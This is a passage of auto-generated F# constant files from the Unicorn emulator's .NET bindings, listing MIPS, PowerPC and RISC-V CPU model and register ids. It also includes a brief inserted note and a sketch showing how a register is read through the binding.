UC_MIPS_REG_W16 = 113 let UC_MIPS_REG_W17 = 114 let UC_MIPS_REG_W18 = 115 let UC_MIPS_REG_W19 = 116 let UC_MIPS_REG_W20 = 117 let UC_MIPS_REG_W21 = 118 let UC_MIPS_REG_W22 = 119 let UC_MIPS_REG_W23 = 120 let UC_MIPS_REG_W24 = 121 let UC_MIPS_REG_W25 = 122 let UC_MIPS_REG_W26 = 123 let UC_MIPS_REG_W27 = 124 let UC_MIPS_REG_W28 = 125 let UC_MIPS_REG_W29 = 126 let UC_MIPS_REG_W30 = 127 let UC_MIPS_REG_W31 = 128 let UC_MIPS_REG_HI = 129 let UC_MIPS_REG_LO = 130 let UC_MIPS_REG_P0 = 131 let UC_MIPS_REG_P1 = 132 let UC_MIPS_REG_P2 = 133 let UC_MIPS_REG_MPL0 = 134 let UC_MIPS_REG_MPL1 = 135 let UC_MIPS_REG_MPL2 = 136 let UC_MIPS_REG_CP0_CONFIG3 = 137 let UC_MIPS_REG_CP0_USERLOCAL = 138 let UC_MIPS_REG_CP0_STATUS = 139 let UC_MIPS_REG_ENDING = 140 let UC_MIPS_REG_ZERO = 2 let UC_MIPS_REG_AT = 3 let UC_MIPS_REG_V0 = 4 let UC_MIPS_REG_V1 = 5 let UC_MIPS_REG_A0 = 6 let UC_MIPS_REG_A1 = 7 let UC_MIPS_REG_A2 = 8 let UC_MIPS_REG_A3 = 9 let UC_MIPS_REG_T0 = 10 let UC_MIPS_REG_T1 = 11 let UC_MIPS_REG_T2 = 12 let UC_MIPS_REG_T3 = 13 let UC_MIPS_REG_T4 = 14 let UC_MIPS_REG_T5 = 15 let UC_MIPS_REG_T6 = 16 let UC_MIPS_REG_T7 = 17 let UC_MIPS_REG_S0 = 18 let UC_MIPS_REG_S1 = 19 let UC_MIPS_REG_S2 = 20 let UC_MIPS_REG_S3 = 21 let UC_MIPS_REG_S4 = 22 let UC_MIPS_REG_S5 = 23 let UC_MIPS_REG_S6 = 24 let UC_MIPS_REG_S7 = 25 let UC_MIPS_REG_T8 = 26 let UC_MIPS_REG_T9 = 27 let UC_MIPS_REG_K0 = 28 let UC_MIPS_REG_K1 = 29 let UC_MIPS_REG_GP = 30 let UC_MIPS_REG_SP = 31 let UC_MIPS_REG_FP = 32 let UC_MIPS_REG_S8 = 32 let UC_MIPS_REG_RA = 33 let UC_MIPS_REG_HI0 = 45 let UC_MIPS_REG_HI1 = 46 let UC_MIPS_REG_HI2 = 47 let UC_MIPS_REG_HI3 = 48 let UC_MIPS_REG_LO0 = 45 let UC_MIPS_REG_LO1 = 46 let UC_MIPS_REG_LO2 = 47 let UC_MIPS_REG_LO3 = 48 
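One practical note on the id tables above: the trailing alias block does not define new registers; an alias simply reuses the integer id of the register it names (UC_MIPS_REG_FP and UC_MIPS_REG_S8 are both 32, matching UC_MIPS_REG_30), so either name can be passed to RegRead/RegWrite. The following is a small sketch, not part of the source tree, of how these ids are consumed through IBinding, assuming a 32-bit guest and value decoding on a little-endian host.

    // MipsRegisterSketch.fs - hypothetical example, not shipped with the binding
    module MipsRegisterSketch =

        open System
        open UnicornEngine.Binding
        open UnicornEngine.Const

        let readStackPointer (binding: IBinding) (eng: UIntPtr) =
            // register ids are plain ints; values move as raw byte buffers
            let buf = Array.zeroCreate<byte> 4
            binding.RegRead(eng, Mips.UC_MIPS_REG_SP, buf) |> ignore
            BitConverter.ToUInt32(buf, 0)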
unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Ppc.fs000066400000000000000000000325721467524106700232140ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Ppc = // PPC CPU let UC_CPU_PPC32_401 = 0 let UC_CPU_PPC32_401A1 = 1 let UC_CPU_PPC32_401B2 = 2 let UC_CPU_PPC32_401C2 = 3 let UC_CPU_PPC32_401D2 = 4 let UC_CPU_PPC32_401E2 = 5 let UC_CPU_PPC32_401F2 = 6 let UC_CPU_PPC32_401G2 = 7 let UC_CPU_PPC32_IOP480 = 8 let UC_CPU_PPC32_COBRA = 9 let UC_CPU_PPC32_403GA = 10 let UC_CPU_PPC32_403GB = 11 let UC_CPU_PPC32_403GC = 12 let UC_CPU_PPC32_403GCX = 13 let UC_CPU_PPC32_405D2 = 14 let UC_CPU_PPC32_405D4 = 15 let UC_CPU_PPC32_405CRA = 16 let UC_CPU_PPC32_405CRB = 17 let UC_CPU_PPC32_405CRC = 18 let UC_CPU_PPC32_405EP = 19 let UC_CPU_PPC32_405EZ = 20 let UC_CPU_PPC32_405GPA = 21 let UC_CPU_PPC32_405GPB = 22 let UC_CPU_PPC32_405GPC = 23 let UC_CPU_PPC32_405GPD = 24 let UC_CPU_PPC32_405GPR = 25 let UC_CPU_PPC32_405LP = 26 let UC_CPU_PPC32_NPE405H = 27 let UC_CPU_PPC32_NPE405H2 = 28 let UC_CPU_PPC32_NPE405L = 29 let UC_CPU_PPC32_NPE4GS3 = 30 let UC_CPU_PPC32_STB03 = 31 let UC_CPU_PPC32_STB04 = 32 let UC_CPU_PPC32_STB25 = 33 let UC_CPU_PPC32_X2VP4 = 34 let UC_CPU_PPC32_X2VP20 = 35 let UC_CPU_PPC32_440_XILINX = 36 let UC_CPU_PPC32_440_XILINX_W_DFPU = 37 let UC_CPU_PPC32_440EPA = 38 let UC_CPU_PPC32_440EPB = 39 let UC_CPU_PPC32_440EPX = 40 let UC_CPU_PPC32_460EXB = 41 let UC_CPU_PPC32_G2 = 42 let UC_CPU_PPC32_G2H4 = 43 let UC_CPU_PPC32_G2GP = 44 let UC_CPU_PPC32_G2LS = 45 let UC_CPU_PPC32_G2HIP3 = 46 let UC_CPU_PPC32_G2HIP4 = 47 let UC_CPU_PPC32_MPC603 = 48 let UC_CPU_PPC32_G2LE = 49 let UC_CPU_PPC32_G2LEGP = 50 let UC_CPU_PPC32_G2LELS = 51 let UC_CPU_PPC32_G2LEGP1 = 52 let UC_CPU_PPC32_G2LEGP3 = 53 let UC_CPU_PPC32_MPC5200_V10 = 54 let UC_CPU_PPC32_MPC5200_V11 = 55 let UC_CPU_PPC32_MPC5200_V12 = 56 let UC_CPU_PPC32_MPC5200B_V20 = 57 let UC_CPU_PPC32_MPC5200B_V21 = 58 let UC_CPU_PPC32_E200Z5 = 59 let UC_CPU_PPC32_E200Z6 = 60 let UC_CPU_PPC32_E300C1 = 61 let UC_CPU_PPC32_E300C2 = 62 let UC_CPU_PPC32_E300C3 = 63 let UC_CPU_PPC32_E300C4 = 64 let UC_CPU_PPC32_MPC8343 = 65 let UC_CPU_PPC32_MPC8343A = 66 let UC_CPU_PPC32_MPC8343E = 67 let UC_CPU_PPC32_MPC8343EA = 68 let UC_CPU_PPC32_MPC8347T = 69 let UC_CPU_PPC32_MPC8347P = 70 let UC_CPU_PPC32_MPC8347AT = 71 let UC_CPU_PPC32_MPC8347AP = 72 let UC_CPU_PPC32_MPC8347ET = 73 let UC_CPU_PPC32_MPC8347EP = 74 let UC_CPU_PPC32_MPC8347EAT = 75 let UC_CPU_PPC32_MPC8347EAP = 76 let UC_CPU_PPC32_MPC8349 = 77 let UC_CPU_PPC32_MPC8349A = 78 let UC_CPU_PPC32_MPC8349E = 79 let UC_CPU_PPC32_MPC8349EA = 80 let UC_CPU_PPC32_MPC8377 = 81 let UC_CPU_PPC32_MPC8377E = 82 let UC_CPU_PPC32_MPC8378 = 83 let UC_CPU_PPC32_MPC8378E = 84 let UC_CPU_PPC32_MPC8379 = 85 let UC_CPU_PPC32_MPC8379E = 86 let UC_CPU_PPC32_E500_V10 = 87 let UC_CPU_PPC32_E500_V20 = 88 let UC_CPU_PPC32_E500V2_V10 = 89 let UC_CPU_PPC32_E500V2_V20 = 90 let UC_CPU_PPC32_E500V2_V21 = 91 let UC_CPU_PPC32_E500V2_V22 = 92 let UC_CPU_PPC32_E500V2_V30 = 93 let UC_CPU_PPC32_E500MC = 94 let UC_CPU_PPC32_MPC8533_V10 = 95 let UC_CPU_PPC32_MPC8533_V11 = 96 let UC_CPU_PPC32_MPC8533E_V10 = 97 let UC_CPU_PPC32_MPC8533E_V11 = 98 let UC_CPU_PPC32_MPC8540_V10 = 99 let UC_CPU_PPC32_MPC8540_V20 = 100 let UC_CPU_PPC32_MPC8540_V21 = 101 let UC_CPU_PPC32_MPC8541_V10 = 102 let UC_CPU_PPC32_MPC8541_V11 = 103 let UC_CPU_PPC32_MPC8541E_V10 = 104 let UC_CPU_PPC32_MPC8541E_V11 = 105 let UC_CPU_PPC32_MPC8543_V10 = 106 let UC_CPU_PPC32_MPC8543_V11 = 107 let 
UC_CPU_PPC32_MPC8543_V20 = 108 let UC_CPU_PPC32_MPC8543_V21 = 109 let UC_CPU_PPC32_MPC8543E_V10 = 110 let UC_CPU_PPC32_MPC8543E_V11 = 111 let UC_CPU_PPC32_MPC8543E_V20 = 112 let UC_CPU_PPC32_MPC8543E_V21 = 113 let UC_CPU_PPC32_MPC8544_V10 = 114 let UC_CPU_PPC32_MPC8544_V11 = 115 let UC_CPU_PPC32_MPC8544E_V10 = 116 let UC_CPU_PPC32_MPC8544E_V11 = 117 let UC_CPU_PPC32_MPC8545_V20 = 118 let UC_CPU_PPC32_MPC8545_V21 = 119 let UC_CPU_PPC32_MPC8545E_V20 = 120 let UC_CPU_PPC32_MPC8545E_V21 = 121 let UC_CPU_PPC32_MPC8547E_V20 = 122 let UC_CPU_PPC32_MPC8547E_V21 = 123 let UC_CPU_PPC32_MPC8548_V10 = 124 let UC_CPU_PPC32_MPC8548_V11 = 125 let UC_CPU_PPC32_MPC8548_V20 = 126 let UC_CPU_PPC32_MPC8548_V21 = 127 let UC_CPU_PPC32_MPC8548E_V10 = 128 let UC_CPU_PPC32_MPC8548E_V11 = 129 let UC_CPU_PPC32_MPC8548E_V20 = 130 let UC_CPU_PPC32_MPC8548E_V21 = 131 let UC_CPU_PPC32_MPC8555_V10 = 132 let UC_CPU_PPC32_MPC8555_V11 = 133 let UC_CPU_PPC32_MPC8555E_V10 = 134 let UC_CPU_PPC32_MPC8555E_V11 = 135 let UC_CPU_PPC32_MPC8560_V10 = 136 let UC_CPU_PPC32_MPC8560_V20 = 137 let UC_CPU_PPC32_MPC8560_V21 = 138 let UC_CPU_PPC32_MPC8567 = 139 let UC_CPU_PPC32_MPC8567E = 140 let UC_CPU_PPC32_MPC8568 = 141 let UC_CPU_PPC32_MPC8568E = 142 let UC_CPU_PPC32_MPC8572 = 143 let UC_CPU_PPC32_MPC8572E = 144 let UC_CPU_PPC32_E600 = 145 let UC_CPU_PPC32_MPC8610 = 146 let UC_CPU_PPC32_MPC8641 = 147 let UC_CPU_PPC32_MPC8641D = 148 let UC_CPU_PPC32_601_V0 = 149 let UC_CPU_PPC32_601_V1 = 150 let UC_CPU_PPC32_601_V2 = 151 let UC_CPU_PPC32_602 = 152 let UC_CPU_PPC32_603 = 153 let UC_CPU_PPC32_603E_V1_1 = 154 let UC_CPU_PPC32_603E_V1_2 = 155 let UC_CPU_PPC32_603E_V1_3 = 156 let UC_CPU_PPC32_603E_V1_4 = 157 let UC_CPU_PPC32_603E_V2_2 = 158 let UC_CPU_PPC32_603E_V3 = 159 let UC_CPU_PPC32_603E_V4 = 160 let UC_CPU_PPC32_603E_V4_1 = 161 let UC_CPU_PPC32_603E7 = 162 let UC_CPU_PPC32_603E7T = 163 let UC_CPU_PPC32_603E7V = 164 let UC_CPU_PPC32_603E7V1 = 165 let UC_CPU_PPC32_603E7V2 = 166 let UC_CPU_PPC32_603P = 167 let UC_CPU_PPC32_604 = 168 let UC_CPU_PPC32_604E_V1_0 = 169 let UC_CPU_PPC32_604E_V2_2 = 170 let UC_CPU_PPC32_604E_V2_4 = 171 let UC_CPU_PPC32_604R = 172 let UC_CPU_PPC32_740_V1_0 = 173 let UC_CPU_PPC32_750_V1_0 = 174 let UC_CPU_PPC32_740_V2_0 = 175 let UC_CPU_PPC32_750_V2_0 = 176 let UC_CPU_PPC32_740_V2_1 = 177 let UC_CPU_PPC32_750_V2_1 = 178 let UC_CPU_PPC32_740_V2_2 = 179 let UC_CPU_PPC32_750_V2_2 = 180 let UC_CPU_PPC32_740_V3_0 = 181 let UC_CPU_PPC32_750_V3_0 = 182 let UC_CPU_PPC32_740_V3_1 = 183 let UC_CPU_PPC32_750_V3_1 = 184 let UC_CPU_PPC32_740E = 185 let UC_CPU_PPC32_750E = 186 let UC_CPU_PPC32_740P = 187 let UC_CPU_PPC32_750P = 188 let UC_CPU_PPC32_750CL_V1_0 = 189 let UC_CPU_PPC32_750CL_V2_0 = 190 let UC_CPU_PPC32_750CX_V1_0 = 191 let UC_CPU_PPC32_750CX_V2_0 = 192 let UC_CPU_PPC32_750CX_V2_1 = 193 let UC_CPU_PPC32_750CX_V2_2 = 194 let UC_CPU_PPC32_750CXE_V2_1 = 195 let UC_CPU_PPC32_750CXE_V2_2 = 196 let UC_CPU_PPC32_750CXE_V2_3 = 197 let UC_CPU_PPC32_750CXE_V2_4 = 198 let UC_CPU_PPC32_750CXE_V2_4B = 199 let UC_CPU_PPC32_750CXE_V3_0 = 200 let UC_CPU_PPC32_750CXE_V3_1 = 201 let UC_CPU_PPC32_750CXE_V3_1B = 202 let UC_CPU_PPC32_750CXR = 203 let UC_CPU_PPC32_750FL = 204 let UC_CPU_PPC32_750FX_V1_0 = 205 let UC_CPU_PPC32_750FX_V2_0 = 206 let UC_CPU_PPC32_750FX_V2_1 = 207 let UC_CPU_PPC32_750FX_V2_2 = 208 let UC_CPU_PPC32_750FX_V2_3 = 209 let UC_CPU_PPC32_750GL = 210 let UC_CPU_PPC32_750GX_V1_0 = 211 let UC_CPU_PPC32_750GX_V1_1 = 212 let UC_CPU_PPC32_750GX_V1_2 = 213 let UC_CPU_PPC32_750L_V2_0 = 214 let UC_CPU_PPC32_750L_V2_1 = 215 
let UC_CPU_PPC32_750L_V2_2 = 216 let UC_CPU_PPC32_750L_V3_0 = 217 let UC_CPU_PPC32_750L_V3_2 = 218 let UC_CPU_PPC32_745_V1_0 = 219 let UC_CPU_PPC32_755_V1_0 = 220 let UC_CPU_PPC32_745_V1_1 = 221 let UC_CPU_PPC32_755_V1_1 = 222 let UC_CPU_PPC32_745_V2_0 = 223 let UC_CPU_PPC32_755_V2_0 = 224 let UC_CPU_PPC32_745_V2_1 = 225 let UC_CPU_PPC32_755_V2_1 = 226 let UC_CPU_PPC32_745_V2_2 = 227 let UC_CPU_PPC32_755_V2_2 = 228 let UC_CPU_PPC32_745_V2_3 = 229 let UC_CPU_PPC32_755_V2_3 = 230 let UC_CPU_PPC32_745_V2_4 = 231 let UC_CPU_PPC32_755_V2_4 = 232 let UC_CPU_PPC32_745_V2_5 = 233 let UC_CPU_PPC32_755_V2_5 = 234 let UC_CPU_PPC32_745_V2_6 = 235 let UC_CPU_PPC32_755_V2_6 = 236 let UC_CPU_PPC32_745_V2_7 = 237 let UC_CPU_PPC32_755_V2_7 = 238 let UC_CPU_PPC32_745_V2_8 = 239 let UC_CPU_PPC32_755_V2_8 = 240 let UC_CPU_PPC32_7400_V1_0 = 241 let UC_CPU_PPC32_7400_V1_1 = 242 let UC_CPU_PPC32_7400_V2_0 = 243 let UC_CPU_PPC32_7400_V2_1 = 244 let UC_CPU_PPC32_7400_V2_2 = 245 let UC_CPU_PPC32_7400_V2_6 = 246 let UC_CPU_PPC32_7400_V2_7 = 247 let UC_CPU_PPC32_7400_V2_8 = 248 let UC_CPU_PPC32_7400_V2_9 = 249 let UC_CPU_PPC32_7410_V1_0 = 250 let UC_CPU_PPC32_7410_V1_1 = 251 let UC_CPU_PPC32_7410_V1_2 = 252 let UC_CPU_PPC32_7410_V1_3 = 253 let UC_CPU_PPC32_7410_V1_4 = 254 let UC_CPU_PPC32_7448_V1_0 = 255 let UC_CPU_PPC32_7448_V1_1 = 256 let UC_CPU_PPC32_7448_V2_0 = 257 let UC_CPU_PPC32_7448_V2_1 = 258 let UC_CPU_PPC32_7450_V1_0 = 259 let UC_CPU_PPC32_7450_V1_1 = 260 let UC_CPU_PPC32_7450_V1_2 = 261 let UC_CPU_PPC32_7450_V2_0 = 262 let UC_CPU_PPC32_7450_V2_1 = 263 let UC_CPU_PPC32_7441_V2_1 = 264 let UC_CPU_PPC32_7441_V2_3 = 265 let UC_CPU_PPC32_7451_V2_3 = 266 let UC_CPU_PPC32_7441_V2_10 = 267 let UC_CPU_PPC32_7451_V2_10 = 268 let UC_CPU_PPC32_7445_V1_0 = 269 let UC_CPU_PPC32_7455_V1_0 = 270 let UC_CPU_PPC32_7445_V2_1 = 271 let UC_CPU_PPC32_7455_V2_1 = 272 let UC_CPU_PPC32_7445_V3_2 = 273 let UC_CPU_PPC32_7455_V3_2 = 274 let UC_CPU_PPC32_7445_V3_3 = 275 let UC_CPU_PPC32_7455_V3_3 = 276 let UC_CPU_PPC32_7445_V3_4 = 277 let UC_CPU_PPC32_7455_V3_4 = 278 let UC_CPU_PPC32_7447_V1_0 = 279 let UC_CPU_PPC32_7457_V1_0 = 280 let UC_CPU_PPC32_7447_V1_1 = 281 let UC_CPU_PPC32_7457_V1_1 = 282 let UC_CPU_PPC32_7457_V1_2 = 283 let UC_CPU_PPC32_7447A_V1_0 = 284 let UC_CPU_PPC32_7457A_V1_0 = 285 let UC_CPU_PPC32_7447A_V1_1 = 286 let UC_CPU_PPC32_7457A_V1_1 = 287 let UC_CPU_PPC32_7447A_V1_2 = 288 let UC_CPU_PPC32_7457A_V1_2 = 289 let UC_CPU_PPC32_ENDING = 290 // PPC64 CPU let UC_CPU_PPC64_E5500 = 0 let UC_CPU_PPC64_E6500 = 1 let UC_CPU_PPC64_970_V2_2 = 2 let UC_CPU_PPC64_970FX_V1_0 = 3 let UC_CPU_PPC64_970FX_V2_0 = 4 let UC_CPU_PPC64_970FX_V2_1 = 5 let UC_CPU_PPC64_970FX_V3_0 = 6 let UC_CPU_PPC64_970FX_V3_1 = 7 let UC_CPU_PPC64_970MP_V1_0 = 8 let UC_CPU_PPC64_970MP_V1_1 = 9 let UC_CPU_PPC64_POWER5_V2_1 = 10 let UC_CPU_PPC64_POWER7_V2_3 = 11 let UC_CPU_PPC64_POWER7_V2_1 = 12 let UC_CPU_PPC64_POWER8E_V2_1 = 13 let UC_CPU_PPC64_POWER8_V2_0 = 14 let UC_CPU_PPC64_POWER8NVL_V1_0 = 15 let UC_CPU_PPC64_POWER9_V1_0 = 16 let UC_CPU_PPC64_POWER9_V2_0 = 17 let UC_CPU_PPC64_POWER10_V1_0 = 18 let UC_CPU_PPC64_ENDING = 19 // PPC registers let UC_PPC_REG_INVALID = 0 // General purpose registers let UC_PPC_REG_PC = 1 let UC_PPC_REG_0 = 2 let UC_PPC_REG_1 = 3 let UC_PPC_REG_2 = 4 let UC_PPC_REG_3 = 5 let UC_PPC_REG_4 = 6 let UC_PPC_REG_5 = 7 let UC_PPC_REG_6 = 8 let UC_PPC_REG_7 = 9 let UC_PPC_REG_8 = 10 let UC_PPC_REG_9 = 11 let UC_PPC_REG_10 = 12 let UC_PPC_REG_11 = 13 let UC_PPC_REG_12 = 14 let UC_PPC_REG_13 = 15 let UC_PPC_REG_14 = 16 let 
UC_PPC_REG_15 = 17 let UC_PPC_REG_16 = 18 let UC_PPC_REG_17 = 19 let UC_PPC_REG_18 = 20 let UC_PPC_REG_19 = 21 let UC_PPC_REG_20 = 22 let UC_PPC_REG_21 = 23 let UC_PPC_REG_22 = 24 let UC_PPC_REG_23 = 25 let UC_PPC_REG_24 = 26 let UC_PPC_REG_25 = 27 let UC_PPC_REG_26 = 28 let UC_PPC_REG_27 = 29 let UC_PPC_REG_28 = 30 let UC_PPC_REG_29 = 31 let UC_PPC_REG_30 = 32 let UC_PPC_REG_31 = 33 let UC_PPC_REG_CR0 = 34 let UC_PPC_REG_CR1 = 35 let UC_PPC_REG_CR2 = 36 let UC_PPC_REG_CR3 = 37 let UC_PPC_REG_CR4 = 38 let UC_PPC_REG_CR5 = 39 let UC_PPC_REG_CR6 = 40 let UC_PPC_REG_CR7 = 41 let UC_PPC_REG_FPR0 = 42 let UC_PPC_REG_FPR1 = 43 let UC_PPC_REG_FPR2 = 44 let UC_PPC_REG_FPR3 = 45 let UC_PPC_REG_FPR4 = 46 let UC_PPC_REG_FPR5 = 47 let UC_PPC_REG_FPR6 = 48 let UC_PPC_REG_FPR7 = 49 let UC_PPC_REG_FPR8 = 50 let UC_PPC_REG_FPR9 = 51 let UC_PPC_REG_FPR10 = 52 let UC_PPC_REG_FPR11 = 53 let UC_PPC_REG_FPR12 = 54 let UC_PPC_REG_FPR13 = 55 let UC_PPC_REG_FPR14 = 56 let UC_PPC_REG_FPR15 = 57 let UC_PPC_REG_FPR16 = 58 let UC_PPC_REG_FPR17 = 59 let UC_PPC_REG_FPR18 = 60 let UC_PPC_REG_FPR19 = 61 let UC_PPC_REG_FPR20 = 62 let UC_PPC_REG_FPR21 = 63 let UC_PPC_REG_FPR22 = 64 let UC_PPC_REG_FPR23 = 65 let UC_PPC_REG_FPR24 = 66 let UC_PPC_REG_FPR25 = 67 let UC_PPC_REG_FPR26 = 68 let UC_PPC_REG_FPR27 = 69 let UC_PPC_REG_FPR28 = 70 let UC_PPC_REG_FPR29 = 71 let UC_PPC_REG_FPR30 = 72 let UC_PPC_REG_FPR31 = 73 let UC_PPC_REG_LR = 74 let UC_PPC_REG_XER = 75 let UC_PPC_REG_CTR = 76 let UC_PPC_REG_MSR = 77 let UC_PPC_REG_FPSCR = 78 let UC_PPC_REG_CR = 79 let UC_PPC_REG_ENDING = 80 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Riscv.fs000066400000000000000000000217451467524106700235600ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Riscv = // RISCV32 CPU let UC_CPU_RISCV32_ANY = 0 let UC_CPU_RISCV32_BASE32 = 1 let UC_CPU_RISCV32_SIFIVE_E31 = 2 let UC_CPU_RISCV32_SIFIVE_U34 = 3 let UC_CPU_RISCV32_ENDING = 4 // RISCV64 CPU let UC_CPU_RISCV64_ANY = 0 let UC_CPU_RISCV64_BASE64 = 1 let UC_CPU_RISCV64_SIFIVE_E51 = 2 let UC_CPU_RISCV64_SIFIVE_U54 = 3 let UC_CPU_RISCV64_ENDING = 4 // RISCV registers let UC_RISCV_REG_INVALID = 0 // General purpose registers let UC_RISCV_REG_X0 = 1 let UC_RISCV_REG_X1 = 2 let UC_RISCV_REG_X2 = 3 let UC_RISCV_REG_X3 = 4 let UC_RISCV_REG_X4 = 5 let UC_RISCV_REG_X5 = 6 let UC_RISCV_REG_X6 = 7 let UC_RISCV_REG_X7 = 8 let UC_RISCV_REG_X8 = 9 let UC_RISCV_REG_X9 = 10 let UC_RISCV_REG_X10 = 11 let UC_RISCV_REG_X11 = 12 let UC_RISCV_REG_X12 = 13 let UC_RISCV_REG_X13 = 14 let UC_RISCV_REG_X14 = 15 let UC_RISCV_REG_X15 = 16 let UC_RISCV_REG_X16 = 17 let UC_RISCV_REG_X17 = 18 let UC_RISCV_REG_X18 = 19 let UC_RISCV_REG_X19 = 20 let UC_RISCV_REG_X20 = 21 let UC_RISCV_REG_X21 = 22 let UC_RISCV_REG_X22 = 23 let UC_RISCV_REG_X23 = 24 let UC_RISCV_REG_X24 = 25 let UC_RISCV_REG_X25 = 26 let UC_RISCV_REG_X26 = 27 let UC_RISCV_REG_X27 = 28 let UC_RISCV_REG_X28 = 29 let UC_RISCV_REG_X29 = 30 let UC_RISCV_REG_X30 = 31 let UC_RISCV_REG_X31 = 32 // RISCV CSR let UC_RISCV_REG_USTATUS = 33 let UC_RISCV_REG_UIE = 34 let UC_RISCV_REG_UTVEC = 35 let UC_RISCV_REG_USCRATCH = 36 let UC_RISCV_REG_UEPC = 37 let UC_RISCV_REG_UCAUSE = 38 let UC_RISCV_REG_UTVAL = 39 let UC_RISCV_REG_UIP = 40 let UC_RISCV_REG_FFLAGS = 41 let UC_RISCV_REG_FRM = 42 let UC_RISCV_REG_FCSR = 43 let UC_RISCV_REG_CYCLE = 44 let UC_RISCV_REG_TIME = 45 let UC_RISCV_REG_INSTRET = 46 let UC_RISCV_REG_HPMCOUNTER3 = 47 let UC_RISCV_REG_HPMCOUNTER4 = 48 let 
UC_RISCV_REG_HPMCOUNTER5 = 49 let UC_RISCV_REG_HPMCOUNTER6 = 50 let UC_RISCV_REG_HPMCOUNTER7 = 51 let UC_RISCV_REG_HPMCOUNTER8 = 52 let UC_RISCV_REG_HPMCOUNTER9 = 53 let UC_RISCV_REG_HPMCOUNTER10 = 54 let UC_RISCV_REG_HPMCOUNTER11 = 55 let UC_RISCV_REG_HPMCOUNTER12 = 56 let UC_RISCV_REG_HPMCOUNTER13 = 57 let UC_RISCV_REG_HPMCOUNTER14 = 58 let UC_RISCV_REG_HPMCOUNTER15 = 59 let UC_RISCV_REG_HPMCOUNTER16 = 60 let UC_RISCV_REG_HPMCOUNTER17 = 61 let UC_RISCV_REG_HPMCOUNTER18 = 62 let UC_RISCV_REG_HPMCOUNTER19 = 63 let UC_RISCV_REG_HPMCOUNTER20 = 64 let UC_RISCV_REG_HPMCOUNTER21 = 65 let UC_RISCV_REG_HPMCOUNTER22 = 66 let UC_RISCV_REG_HPMCOUNTER23 = 67 let UC_RISCV_REG_HPMCOUNTER24 = 68 let UC_RISCV_REG_HPMCOUNTER25 = 69 let UC_RISCV_REG_HPMCOUNTER26 = 70 let UC_RISCV_REG_HPMCOUNTER27 = 71 let UC_RISCV_REG_HPMCOUNTER28 = 72 let UC_RISCV_REG_HPMCOUNTER29 = 73 let UC_RISCV_REG_HPMCOUNTER30 = 74 let UC_RISCV_REG_HPMCOUNTER31 = 75 let UC_RISCV_REG_CYCLEH = 76 let UC_RISCV_REG_TIMEH = 77 let UC_RISCV_REG_INSTRETH = 78 let UC_RISCV_REG_HPMCOUNTER3H = 79 let UC_RISCV_REG_HPMCOUNTER4H = 80 let UC_RISCV_REG_HPMCOUNTER5H = 81 let UC_RISCV_REG_HPMCOUNTER6H = 82 let UC_RISCV_REG_HPMCOUNTER7H = 83 let UC_RISCV_REG_HPMCOUNTER8H = 84 let UC_RISCV_REG_HPMCOUNTER9H = 85 let UC_RISCV_REG_HPMCOUNTER10H = 86 let UC_RISCV_REG_HPMCOUNTER11H = 87 let UC_RISCV_REG_HPMCOUNTER12H = 88 let UC_RISCV_REG_HPMCOUNTER13H = 89 let UC_RISCV_REG_HPMCOUNTER14H = 90 let UC_RISCV_REG_HPMCOUNTER15H = 91 let UC_RISCV_REG_HPMCOUNTER16H = 92 let UC_RISCV_REG_HPMCOUNTER17H = 93 let UC_RISCV_REG_HPMCOUNTER18H = 94 let UC_RISCV_REG_HPMCOUNTER19H = 95 let UC_RISCV_REG_HPMCOUNTER20H = 96 let UC_RISCV_REG_HPMCOUNTER21H = 97 let UC_RISCV_REG_HPMCOUNTER22H = 98 let UC_RISCV_REG_HPMCOUNTER23H = 99 let UC_RISCV_REG_HPMCOUNTER24H = 100 let UC_RISCV_REG_HPMCOUNTER25H = 101 let UC_RISCV_REG_HPMCOUNTER26H = 102 let UC_RISCV_REG_HPMCOUNTER27H = 103 let UC_RISCV_REG_HPMCOUNTER28H = 104 let UC_RISCV_REG_HPMCOUNTER29H = 105 let UC_RISCV_REG_HPMCOUNTER30H = 106 let UC_RISCV_REG_HPMCOUNTER31H = 107 let UC_RISCV_REG_MCYCLE = 108 let UC_RISCV_REG_MINSTRET = 109 let UC_RISCV_REG_MCYCLEH = 110 let UC_RISCV_REG_MINSTRETH = 111 let UC_RISCV_REG_MVENDORID = 112 let UC_RISCV_REG_MARCHID = 113 let UC_RISCV_REG_MIMPID = 114 let UC_RISCV_REG_MHARTID = 115 let UC_RISCV_REG_MSTATUS = 116 let UC_RISCV_REG_MISA = 117 let UC_RISCV_REG_MEDELEG = 118 let UC_RISCV_REG_MIDELEG = 119 let UC_RISCV_REG_MIE = 120 let UC_RISCV_REG_MTVEC = 121 let UC_RISCV_REG_MCOUNTEREN = 122 let UC_RISCV_REG_MSTATUSH = 123 let UC_RISCV_REG_MUCOUNTEREN = 124 let UC_RISCV_REG_MSCOUNTEREN = 125 let UC_RISCV_REG_MHCOUNTEREN = 126 let UC_RISCV_REG_MSCRATCH = 127 let UC_RISCV_REG_MEPC = 128 let UC_RISCV_REG_MCAUSE = 129 let UC_RISCV_REG_MTVAL = 130 let UC_RISCV_REG_MIP = 131 let UC_RISCV_REG_MBADADDR = 132 let UC_RISCV_REG_SSTATUS = 133 let UC_RISCV_REG_SEDELEG = 134 let UC_RISCV_REG_SIDELEG = 135 let UC_RISCV_REG_SIE = 136 let UC_RISCV_REG_STVEC = 137 let UC_RISCV_REG_SCOUNTEREN = 138 let UC_RISCV_REG_SSCRATCH = 139 let UC_RISCV_REG_SEPC = 140 let UC_RISCV_REG_SCAUSE = 141 let UC_RISCV_REG_STVAL = 142 let UC_RISCV_REG_SIP = 143 let UC_RISCV_REG_SBADADDR = 144 let UC_RISCV_REG_SPTBR = 145 let UC_RISCV_REG_SATP = 146 let UC_RISCV_REG_HSTATUS = 147 let UC_RISCV_REG_HEDELEG = 148 let UC_RISCV_REG_HIDELEG = 149 let UC_RISCV_REG_HIE = 150 let UC_RISCV_REG_HCOUNTEREN = 151 let UC_RISCV_REG_HTVAL = 152 let UC_RISCV_REG_HIP = 153 let UC_RISCV_REG_HTINST = 154 let UC_RISCV_REG_HGATP = 155 let 
